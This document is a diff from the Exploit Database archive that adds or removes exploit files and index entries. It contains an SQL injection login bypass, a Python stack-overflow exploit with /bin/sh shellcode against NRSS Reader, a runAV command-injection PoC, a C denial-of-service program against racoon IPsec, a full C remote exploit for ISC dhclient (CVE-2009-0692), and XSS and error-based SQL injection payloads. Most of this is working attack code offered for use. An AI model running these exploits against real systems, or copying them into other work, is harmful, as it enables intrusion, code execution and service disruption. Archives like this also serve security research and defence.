39809,platforms/windows/local/39809..cs,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
39810,platforms/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack-Based Overflow",2016-05-13,"Juan Sacco",linux,local,0
39811,platforms/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,linux,local,0
39812,platforms/multiple/dos/39812.txt,"Wireshark - AirPDcapDecryptWPABroadcastKey Heap-Based Out-of-Bounds Read",2016-05-13,"Google Security Research",multiple,dos,0

Can't render this file because it is too large.

31
platforms/asp/webapps/8528.txt
View file

@ -1,31 +0,0 @@
-----------------------------------------------------
-----------------------------------------------------
Absolute Form Processor XE-V 1.5 (auth Bypass) Remote Sql Injecion
-----------------------------------------------------
Founder: ThE g0bL!N(Dz)
Home: www.h4ckf0ru.com
Vive Algerie
# demo : http://www.xigla.com/absolutefp/demo/
Note : Les Algerien Rasa wa Li Yekhreb Fina Basa :)
-----------------------------------------------------------
-----------------------------------------------------------
exploit
-------
http://www.xigla.com/absolutefp/demo/login.asp
username: ' or '1=1
Password: ThE g0bL!N Or any Thing
demo:
-----
http://www.xigla.com/absolutefp/demo/login.asp
------------------------------------------------------
------------------------------------------------------
Thanx :
M0nSt3r-Dz - Master_FinaL - Dr-HTmL - Super Cristal- Hcoca_Man - Dreadful
Yassine_Enp- ViRuS_HaCkEr_Dz-Mr.JOoMJOoM-Naili- Str0ke - Milw0rm.com
------------------------------------------------------------------------------------
www.h4ckf0ru.com/vb/
------------------------------------------------------------------------------------
# milw0rm.com [2009-04-24]

58
platforms/linux/local/39810.py Executable file
View file

@ -0,0 +1,58 @@
# Exploit developed using Exploit Pack v5.4
# Exploit Author: Juan Sacco - http://www.exploitpack.com - jsacco@exploitpack.com
# Program affected: NRSS RSS Reader
# Version: 0.3.9-1
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
# Program description: NRSS is a console based RSS reader allowing
# uses to read and manage RSS feeds
# Kali Linux 2.0 package: pool/main/n/nrss/nrss_0.3.9-1_i386.deb
# MD5sum: 27d997c89340ebb6f4a1d9e1eb28ea39
# Website: http://www.codezen.org/nrss/
#
# gdb$ run -F $(python -c 'print "A"*256+"DCBA"')
# Starting program: /usr/bin/nrss -F $(python -c 'print "A"*256+"DCBA"')
#
# Program received signal SIGSEGV, Segmentation fault.
# --------------------------------------------------------------------------[regs]
# EAX: 0x00000000 EBX: 0x41414141 ECX: 0x00000000 EDX: 0x0809040C o d I t S z a p c
# ESI: 0x41414141 EDI: 0x41414141 EBP: 0x41414141 ESP: 0xBFFFED60 EIP: 0x41424344
# CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007BError while running hook_stop:
# Cannot access memory at address 0x41424344
# 0x41424344 in ?? ()
import os, subprocess
def run():
try:
print "# NRSS News Reader - Stack Buffer Overflow by Juan Sacco"
print "# This Exploit has been developed using Exploit Pack"
# NOPSLED + SHELLCODE + EIP
buffersize = 256
nopsled = "\x90"*200
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
eip = "\xd0\xec\xff\xbf"
buffer = nopsled * (buffersize-len(shellcode)) + eip
subprocess.call(["nrss -F",' ', buffer])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "Sorry, NRSS Reader - Not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Snap! Something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit NRSS Reader v0.3.9-1 Local Overflow Exploit"
print "Author: Juan Sacco - Exploit Pack"
except IndexError:
howtousage()
run()

46
platforms/linux/local/39811.txt Executable file
View file

@ -0,0 +1,46 @@
# Title : runAV mod_security Remote Command Execution
# Date : 13/05/2016
# Author : R-73eN
# Tested on : mod_security with runAV Linux 4.2.0-30-generic #36-Ubuntu SMP Fri Feb 26 00:57:19 UTC 2016 i686 i686 i686 GNU/Linux
# Software : https://github.com/SpiderLabs/owasp-modsecurity-crs/tree/master/util/av-scanning/runAV
# Vendor : https://www.modsecurity.org/
# ___ __ ____ _ _
# |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | |
# | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | |
# | || | | | _| (_) | |_| | __/ | | | / ___ \| |___
# |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|
#
#
#include "common.h"
main(int argc, char *argv[])
{
char cmd[MAX_OUTPUT_SIZE];
char output[MAX_OUTPUT_SIZE];
int error;
char *colon;
char *keyword;
if (argc > 1) {
sprintf (cmd, "/usr/bin/clamscan --no-summary %s", argv[1]);
output[0] = '\0';
error = run_cmd(cmd,output,MAX_OUTPUT_SIZE);
+++++++++++++++++ OTHER CODE +++++++++++++++++++++++++++++++++
The argv[1] parameter is passed unsanitized to a sprintf function which sends the formatted output to the cmd variable,
which is later passed as a parameter to a run_cmd function on line 14.
https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/master/util/av-scanning/runAV/runAV.c#L14
POC:
snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$ ./runAV "foo.php;touch /tmp/pwn3d"
sh: 1: /usr/bin/clamscan: not found
1 exec empty: OK
snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$ ls -la /tmp/ | grep pwn3d
-rw-rw-r-- 1 snort snort 0 Maj 13 16:45 pwn3d
snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$

37
platforms/linux/webapps/14129.txt
View file

@ -1,37 +0,0 @@
Name : I-net Multi User Email Script SQLi Vulnerability
Date : june, 27 2010
Critical Level : HIGH
Vendor Url : http://www.i-netsolution.com/
Google Dork: inurl:/jobsearchengine/
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz
#######################################################################################################
Description:
i-Net Multi User Email Script to start your own Email Website like GMAIL, YAHOO Mail, Hot Mail made in CGI/PERL, tested over Linux
Servers. Features of i-Net Multi User Email Script, Advanced Spam Filtering, RBL Blacklisting, Completely MIME compatible, Contact List
Members Filter Proof, Multiple Skins, Limit Users Outgoing Mail (Depending on User Level) Sort Inbox With Several Criteria, Fully
customizable via HTML templates, Mod_Perl Compatible, New Mail Sounds, WYSIWYG Mail Interface, Multiple Tiered Premium Accounts, Premium
Accounts using Paypal & Subscriptions, SMTP or Send mail, Fully functional calendar and scheduler, Unlimited User Folders, Folder Filtering
(Incoming mail directed to specific folders), Email notifications of new mail, MySQL backend, Backup, Powerful Admin Panel, Ban IP, Advanced
User Editing, Account Suspensions, User Address Book, i-Net Talk and many more features.
#######################################################################################################
Xploit: SQLi VUlnerability
The I-net Multi User Email Script has SQli vuln :D
DEMO URL : http://<server>/path/products/2daybizemail/php121_editname.php?uid=[sqli]
###############################################################################################################
# 0day no more
# Sid3^effects

140
platforms/multiple/dos/10014.txt
View file

@ -1,140 +0,0 @@
/* racoon-isakmp-dos.c
*
* Copyright (c) 2009 by <mu-b@digit-labs.org>
*
* ipsec-tools racoon frag-isakmp DoS POC
* by mu-b - Thu Apr 02 2009
*
* - Tested on: ipsec-tools-0.7.1
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2009!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/types.h>
#define DEF_PORT 500
#define PORT_ISAKMP DEF_PORT
#define ISAKMP_VERSION_NUMBER 0x10
#define ISAKMP_ETYPE_BASE 1 /* Base */
/* Frag does not seems to be documented */
#define ISAKMP_NPTYPE_FRAG 132 /* IKE fragmentation payload */
/* flags */
#define ISAKMP_FRAG_LAST 1
typedef u_char cookie_t[8];
/* 3.1 ISAKMP Header Format */
struct isakmp {
cookie_t i_ck; /* Initiator Cookie */
cookie_t r_ck; /* Responder Cookie */
unsigned char np; /* Next Payload Type */
unsigned char v;
unsigned char etype; /* Exchange Type */
unsigned char flags; /* Flags */
unsigned int msgid;
unsigned int len; /* Length */
};
/* IKE fragmentation payload */
struct isakmp_frag {
unsigned short unknown0; /* always set to zero? */
unsigned short len;
unsigned short unknown1; /* always set to 1? */
unsigned char index;
unsigned char flags;
};
/* used to verify the r_ck. */
static u_char r_ck0[] = { 0,0,0,0,0,0,0,0 };
static void
isa_kmp_dos (char *host)
{
char buf[sizeof (struct isakmp) +
sizeof (struct isakmp_frag)];
struct isakmp *hdr;
struct isakmp_frag *frag;
struct sockaddr_in saddr;
struct hostent *hp;
int fd, i, len, n;
if ((fd = socket (AF_INET, SOCK_DGRAM, 0)) == -1)
{
perror ("socket()");
exit (EXIT_FAILURE);
}
if ((hp = gethostbyname (host)) == NULL)
{
perror ("gethostbyname()");
exit (EXIT_FAILURE);
}
memset (&saddr, 0, sizeof saddr);
memcpy ((char *) &saddr.sin_addr, hp->h_addr, hp->h_length);
saddr.sin_family = AF_INET;
saddr.sin_port = htons (PORT_ISAKMP);
/* formulate request */
memset (buf, 0, sizeof (buf));
hdr = (struct isakmp *) buf;
frag = (struct isakmp_frag *) (hdr + 1);
for (i = 0; i < sizeof (hdr->i_ck); i++)
hdr->i_ck[i] = (rand () % 255) + 1;
memcpy (&hdr->r_ck, r_ck0, sizeof (hdr->r_ck));
hdr->v = ISAKMP_VERSION_NUMBER;
hdr->flags = 0;
hdr->etype = ISAKMP_ETYPE_BASE;
hdr->msgid = 0;
hdr->np = ISAKMP_NPTYPE_FRAG;
len = sizeof (struct isakmp) + sizeof (struct isakmp_frag);
hdr->len = htonl (len);
frag->len = htons (sizeof (struct isakmp_frag));
frag->index = 1;
frag->flags = ISAKMP_FRAG_LAST;
n = sendto (fd, hdr, len, 0, (struct sockaddr *) &saddr, sizeof saddr);
if (n < 0 || n != len)
{
fprintf (stderr, "isa_kmp_dos: sendto %d != %d\n", n, len);
exit (EXIT_FAILURE);
}
close (fd);
}
int
main (int argc, char **argv)
{
printf ("ipsec-tools racoon frag-isakmp DoS PoC\n"
"by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n");
if (argc <= 1)
{
fprintf (stderr, "Usage: %s <host>\n", argv[0]);
exit (EXIT_SUCCESS);
}
printf ("* crashing racoon... ");
isa_kmp_dos (argv[1]);
printf ("done\n\n");
return (EXIT_SUCCESS);
}

80
platforms/multiple/dos/39812.txt Executable file
View file

@ -0,0 +1,80 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=740
The following crash due to a heap-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==8910==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001335c at pc 0x0000004558a4 bp 0x7fffa0f13710 sp 0x7fffa0f12ec0
READ of size 16385 at 0x61b00001335c thread T0
#0 0x4558a3 in memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:438
#1 0x7f1d70c97b65 in g_memdup (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x65b65)
#2 0x7f1d78b4c531 in AirPDcapDecryptWPABroadcastKey wireshark/epan/crypt/airpdcap.c:360:32
#3 0x7f1d78b4ba8c in AirPDcapRsna4WHandshake wireshark/epan/crypt/airpdcap.c:1522:21
#4 0x7f1d78b424f6 in AirPDcapScanForKeys wireshark/epan/crypt/airpdcap.c:602:13
#5 0x7f1d78b40d28 in AirPDcapPacketProcess wireshark/epan/crypt/airpdcap.c:815:21
#6 0x7f1d79a70590 in dissect_ieee80211_common wireshark/epan/dissectors/packet-ieee80211.c:17818:9
#7 0x7f1d79a44406 in dissect_ieee80211 wireshark/epan/dissectors/packet-ieee80211.c:18426:10
#8 0x7f1d7898a941 in call_dissector_through_handle wireshark/epan/packet.c:626:8
#9 0x7f1d7897d0ca in call_dissector_work wireshark/epan/packet.c:701:9
#10 0x7f1d7897c89d in dissector_try_uint_new wireshark/epan/packet.c:1160:9
#11 0x7f1d796c1235 in dissect_frame wireshark/epan/dissectors/packet-frame.c:493:11
#12 0x7f1d7898a941 in call_dissector_through_handle wireshark/epan/packet.c:626:8
#13 0x7f1d7897d0ca in call_dissector_work wireshark/epan/packet.c:701:9
#14 0x7f1d78986c0e in call_dissector_only wireshark/epan/packet.c:2674:8
#15 0x7f1d7897839f in call_dissector_with_data wireshark/epan/packet.c:2687:8
#16 0x7f1d789778c1 in dissect_record wireshark/epan/packet.c:509:3
#17 0x7f1d7892ac99 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2
#18 0x52eebb in process_packet wireshark/tshark.c:3748:5
#19 0x5281ac in load_cap_file wireshark/tshark.c:3504:11
#20 0x51e4bc in main wireshark/tshark.c:2213:13
0x61b00001335c is located 0 bytes to the right of 1500-byte region [0x61b000012d80,0x61b00001335c)
allocated by thread T0 here:
#0 0x4c2098 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7f1d70c80610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
#2 0x7f1d8543f638 in wtap_open_offline wireshark/wiretap/file_access.c:1082:2
#3 0x5244dd in cf_open wireshark/tshark.c:4215:9
#4 0x51decd in main wireshark/tshark.c:2204:9
SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:438 in memcpy
Shadow bytes around the buggy address:
0x0c367fffa610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c367fffa660: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa
0x0c367fffa670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffa680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffa690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa6a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa6b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==8910==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12175. Attached are three files which trigger the crash.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39812.zip

306
platforms/multiple/remote/10015.txt
View file

@ -1,306 +0,0 @@
/*
* cve-2009-0692.c
*
* ISC DHCP dhclient < 3.1.2p1 Remote Exploit
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0692
*
* Stack-based buffer overflow in the script_write_params method in
* client/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before
* 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers to
* execute arbitrary code via a crafted subnet-mask option.
*
* Usage:
*
* $ gcc cve-2009-0692.c -o cve-2009-0692 -lpcap -ldnet
* $ sudo ./cve-2009-0692
* [+] listening on eth0: ip and udp and src port 68 and dst port 67
* [+] snarfed DHCP request from 00:19:d1:90:e5:4a with xid 0x120f8920
* [+] sending malicious DHCP response to 00:19:d1:90:e5:4a with xid 0x120f8920
*
* $ gdb /sbin/dhclient
* ...
* DHCPREQUEST on eth0 to 255.255.255.255 port 67
* DHCPACK from 0.6.9.2
* ...
* Program received signal SIGSEGV, Segmentation fault.
* 0x41414141 in ?? ()
*
* Notes:
*
* Only tested with dhclient 3.1.2 on 32-bit Gentoo / GCC 4.3.3. Feel free
* to tweak for your target platform. Depends on libdnet and libpcap.
*
* READABLE_1 and READABLE_2 need to be readable addresses as we fix up the
* stack during our overflow. After a successful return from the vulnerable
* script_write_params function, EIP will be set to JMP_TARGET.
*
* Exclusively for use at DEFCON next week. ;-)
*/
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <dnet.h>
#include <pcap.h>
#define READABLE_1 "\xa8\xfc\x0b\x08" /* for es.client */
#define READABLE_2 "\xbc\x34\x0a\x08" /* for es.prefix */
#define JMP_TARGET "\x41\x41\x41\x41"
#define BPF_FILTER "ip and udp and src port 68 and dst port 67"
#define PKT_BUFSIZ 1514
#define DHCP_OP_REQUEST 1
#define DHCP_OP_REPLY 2
#define DHCP_TYPE_REQUEST 3
#define DHCP_TYPE_ACK 5
#define DHCP_OPT_REQIP 50
#define DHCP_OPT_MSGTYPE 53
#define DHCP_OPT_END 255
#define DHCP_CHADDR_LEN 16
#define SERVERNAME_LEN 64
#define BOOTFILE_LEN 128
#define DHCP_HDR_LEN 240
#define DHCP_OPT_HDR_LEN 2
#ifndef __GNUC__
# define __attribute__(x)
# pragma pack(1)
#endif
struct dhcp_hdr {
uint8_t op;
uint8_t hwtype;
uint8_t hwlen;
uint8_t hwopcount;
uint32_t xid;
uint16_t secs;
uint16_t flags;
uint32_t ciaddr;
uint32_t yiaddr;
uint32_t siaddr;
uint32_t giaddr;
uint8_t chaddr[DHCP_CHADDR_LEN];
uint8_t servername[SERVERNAME_LEN];
uint8_t bootfile[BOOTFILE_LEN];
uint32_t cookie;
} __attribute__((__packed__));
struct dhcp_opt {
uint8_t opt;
uint8_t len;
} __attribute__((__packed__));
#ifndef __GNUC__
# pragma pack()
#endif
void
process(u_char *data, const struct pcap_pkthdr *pkthdr, const u_char *pkt)
{
eth_t *raw;
struct ip_hdr *ip_h;
struct eth_hdr *eth_h;
struct udp_hdr *udp_h;
struct dhcp_hdr *dhcp_h;
struct dhcp_opt *dhcp_opt;
char *dev = data, *ptr;
char pktbuf[PKT_BUFSIZ], options[PKT_BUFSIZ], payload[PKT_BUFSIZ];
int opt_len, clen = pkthdr->caplen;
uint8_t msg_type = 0, payload_len = 0;
uint32_t yiaddr = 0;
/* packet too short */
if (clen < ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + DHCP_OPT_HDR_LEN) {
return;
}
eth_h = (struct eth_hdr *) pkt;
ip_h = (struct ip_hdr *) ((char *) eth_h + ETH_HDR_LEN);
udp_h = (struct udp_hdr *) ((char *) ip_h + IP_HDR_LEN);
dhcp_h = (struct dhcp_hdr *) ((char *) udp_h + UDP_HDR_LEN);
dhcp_opt = (struct dhcp_opt *) ((char *) dhcp_h + DHCP_HDR_LEN);
/* only care about REQUEST opcodes */
if (dhcp_h->op != DHCP_OP_REQUEST) {
return;
}
/* parse DHCP options */
while (1) {
if (dhcp_opt->opt == DHCP_OPT_MSGTYPE) {
if (dhcp_opt->len != 1) {
return;
}
memcpy(&msg_type, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt->len);
}
if (dhcp_opt->opt == DHCP_OPT_REQIP) {
if (dhcp_opt->len != 4) {
return;
}
memcpy(&yiaddr, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt->len);
}
if (dhcp_opt->opt == DHCP_OPT_END) {
break;
}
if (((char *) dhcp_opt - (char *) pkt) + DHCP_OPT_HDR_LEN + dhcp_opt->len > clen) {
break;
}
dhcp_opt = (struct dhcp_opt *) ((char *) dhcp_opt + DHCP_OPT_HDR_LEN + dhcp_opt->len);
}
/* only care about REQUEST msg types */
if (msg_type != DHCP_TYPE_REQUEST) {
return;
}
printf("[+] snarfed DHCP request from %s with xid 0x%08x\n", eth_ntoa(&eth_h->eth_src), dhcp_h->xid);
printf("[+] sending malicious DHCP response to %s with xid 0x%08x\n\n", eth_ntoa(&eth_h->eth_src), dhcp_h->xid);
/* construct stack payload */
memset(payload, 0, sizeof(payload));
ptr = payload;
memset(ptr, 0, 16);
ptr += 16;
memcpy(ptr, READABLE_1, 4);
ptr += 4;
memcpy(ptr, READABLE_2, 4);
ptr += 4;
memset(ptr, 0, 8);
ptr += 8;
memcpy(ptr, "\x04\x00\x00\x00", 4);
ptr += 4;
memset(ptr, 0, 28);
ptr += 28;
memcpy(ptr, JMP_TARGET, 4);
ptr += 4;
payload_len = ptr - payload;
/* dhcp header */
dhcp_h->op = DHCP_OP_REPLY;
memcpy(&dhcp_h->yiaddr, &yiaddr, 4);
/* normal dhcp options */
memset(options, 0, sizeof(options));
ptr = options;
memcpy(ptr, "\x35\x01\x05", 3);
ptr += 3;
memcpy(ptr, "\x36\x04\x00\x06\x09\x02", 6);
ptr += 6;
memcpy(ptr, "\x33\x04\x00\x09\x3a\x80", 6);
ptr += 6;
memcpy(ptr, "\x03\x04\x00\x06\x09\x02", 6);
ptr += 6;
memcpy(ptr, "\x06\x04\x00\x06\x09\x02", 6);
ptr += 6;
/* malicious subnet mask option */
memcpy(ptr, "\x01", 1);
ptr += 1;
memcpy(ptr, &payload_len, 1);
ptr += 1;
memcpy(ptr, payload, payload_len);
ptr += payload_len;
memcpy(ptr, "\xff", 1);
ptr += 1;
opt_len = ptr - options;
/* construct full packet payload */
memset(pktbuf, 0, sizeof(pktbuf));
ptr = pktbuf;
eth_pack_hdr(ptr, ETH_ADDR_BROADCAST, "\xc1\x1e\x20\x09\x06\x92", ETH_TYPE_IP);
ptr += ETH_HDR_LEN;
ip_pack_hdr(ptr, 0, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len, 0x0692, IP_DF, 64, IP_PROTO_UDP, 34145792, IP_ADDR_BROADCAST);
ptr += IP_HDR_LEN;
udp_pack_hdr(ptr, 67, 68, UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);
ptr += UDP_HDR_LEN;
memcpy(ptr, dhcp_h, DHCP_HDR_LEN);
ptr += DHCP_HDR_LEN;
memcpy(ptr, options, opt_len);
ptr += opt_len;
ip_checksum(pktbuf + ETH_HDR_LEN, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);
/* fire off malicious response */
raw = eth_open(dev);
if (!raw) {
fprintf(stderr, "[-] error opening raw socket on %s\n", dev);
exit(1);
}
eth_send(raw, pktbuf, ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);
eth_close(raw);
}
void
usage(char **argv)
{
fprintf(stderr, "usage: %s [-i interface]\n", argv[0]);
exit(1);
}
int
main(int argc, char **argv)
{
int ch, ret;
char *dev = NULL;
char errbuf[PCAP_ERRBUF_SIZE];
struct bpf_program bfp;
pcap_t *ph;
opterr = 0;
while ((ch = getopt(argc, argv, "i:")) != -1) {
switch (ch) {
case 'i':
dev = optarg;
break;
default:
usage(argv);
}
}
if (!dev) {
dev = pcap_lookupdev(errbuf);
if (!dev) {
fprintf(stderr, "[-] couldn't find default interface: %s\n", errbuf);
exit(1);
}
}
ph = pcap_open_live(dev, PKT_BUFSIZ, 1, 1, errbuf);
if (!ph) {
fprintf(stderr, "[-] couldn't open interface %s: %s\n", dev, errbuf);
exit(1);
}
ret = pcap_compile(ph, &bfp, BPF_FILTER, 1, 0);
if (ret == -1) {
fprintf(stderr, "[-] couldn't parse BPF filter: %s\n", pcap_geterr(ph));
exit(1);
}
pcap_setfilter(ph, &bfp);
if (ret == -1) {
fprintf(stderr, "[-] couldn't set BPF filter: %s\n", pcap_geterr(ph));
exit(1);
}
printf("[+] listening on %s: %s\n", dev, BPF_FILTER);
pcap_loop(ph, -1, process, dev);
return 0;
}

4
platforms/php/webapps/25459.txt
View file

@ -1,4 +1,8 @@
source: http://www.securityfocus.com/bid/13256/info
source: http://www.securityfocus.com/bid/13257/info
source: http://www.securityfocus.com/bid/13258/info
source: http://www.securityfocus.com/bid/13259/info
source: http://www.securityfocus.com/bid/13260/info
CityPost Image Cropper/Resizer is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'image-editor-52.php' script.

7
platforms/php/webapps/25460.txt
View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/13257/info
CityPost Image Cropper/Resizer is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'image-editor-52.php' script.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/image-editor-52/?m1=[XSS]&m2=[XSS]&m3=[XSS]&imgsrc=[XSS]&m4=[XSS]

7
platforms/php/webapps/25461.txt
View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/13258/info
CityPost Image Cropper/Resizer is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'image-editor-52.php' script.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/image-editor-52/?m1=[XSS]&m2=[XSS]&m3=[XSS]&imgsrc=[XSS]&m4=[XSS]

7
platforms/php/webapps/25462.txt
View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/13259/info
CityPost Image Cropper/Resizer is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'image-editor-52.php' script.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/image-editor-52/?m1=[XSS]&m2=[XSS]&m3=[XSS]&imgsrc=[XSS]&m4=[XSS]

7
platforms/php/webapps/25463.txt
View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/13260/info
CityPost Image Cropper/Resizer is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'image-editor-52.php' script.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/image-editor-52/?m1=[XSS]&m2=[XSS]&m3=[XSS]&imgsrc=[XSS]&m4=[XSS]

28
platforms/php/webapps/36563.txt
View file

@ -1,28 +0,0 @@
######################################################################
# Exploit Title: Joomla Gallery WD - SQL Injection Vulnerability
# Google Dork: inurl:option=com_gallery_wd
# Date: 29.03.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Vendor HomePage: http://web-dorado.com/
# Source Component : http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd
# Tested on: Windows
######################################################################
parameter 'theme_id' in GET vulnerable
# Example :
# Parameter: theme_id (GET)
# Type: error-based
# GET Payload : index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
# ==================================================================================== #
parameter 'image_id' in POST vulnerable
# Example :
# URI : /index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2
# Parameter: image_id (POST)
# Type: error-based
# POST Payload: image_id=19 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&rate=&ajax_task=save_hit_count&task=gallerybox.ajax_search
#EOF

50
platforms/php/webapps/7300.txt
View file

@ -1,50 +0,0 @@
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
[~]Tybe:(reviews.aspx ProductID) Blind SQL Injection Vulnerability
[~]Vendor:www.activewebsoftwares.com
[~]Software: Active Price Comparison v 4
[~]author: ((я3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] -----------------------------------------------------------
[~]3xpL0!7 4 d3m0:
http://www.activewebsoftwares.com/demoactivepricecomparison/reviews.aspx?ProductID={bL!ND}
[~] 8L!/\/D:
7Ru3 : links.asp?linkid=1 and 1=1
f4L53: links.asp?linkid=1 and 1=2
N073:
! 7h!/\/k u can f!nd m0r3
just let your m1nd breath ;)
[~]--------------------------------------------------------------------------------------
[~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &الزهيري
[~]
[~] spechial thanks : dolly & 7am3m & عماد & {str0ke}
[~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~] xp10.biz & ahacker.biz
[~]
[~]---------------------------------------------------------------------------------------
# milw0rm.com [2008-11-30]

71
platforms/windows/dos/37349.txt
View file

@ -1,71 +0,0 @@
#####################################################################################
Application: Adobe Photoshop CC 2014 & Bridge CC 2014
Platforms: Windows
Versions: The vulnerability is confirmed in version Photoshop CC 2014 and Bridge CC 2014.
